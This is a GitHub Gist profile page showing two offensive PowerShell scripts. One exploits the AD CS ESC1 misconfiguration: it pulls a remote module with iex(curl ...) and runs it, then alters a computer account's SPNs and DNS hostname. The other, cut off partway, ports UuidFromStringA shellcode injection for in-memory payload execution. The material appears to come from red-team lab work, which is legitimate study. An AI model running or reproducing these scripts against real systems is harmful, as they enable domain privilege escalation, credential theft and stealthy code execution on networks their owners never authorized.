Skip to content

Instantly share code, notes, and snippets.

View Wh04m1001's full-sized avatar

Filip Dragović Wh04m1001

View GitHub Profile
@Wh04m1001
Wh04m1001 / esc1.ps1
Created February 23, 2023 10:44 — forked from b4cktr4ck2/esc1.ps1
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
#Thank you @NotMedic for troubleshooting/validating stuff!
$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER
iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing )
Import-ActiveDirectory
Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose
#in my testing i had to set dnshostname to $null first
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local
@Wh04m1001
Wh04m1001 / UuidFromStringA_Shellcode_Inject.ps1
Created March 27, 2021 18:57
UuidFromStringA ported to powershell
function getDelegateType()
{
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void]);
$type=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('Ref')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('AAA', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate]);
$type.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed');
$type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed');
return $type.CreateType();
}
function LookupFunc() {Param ($moduleName, $functionName);
$assem = ([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods');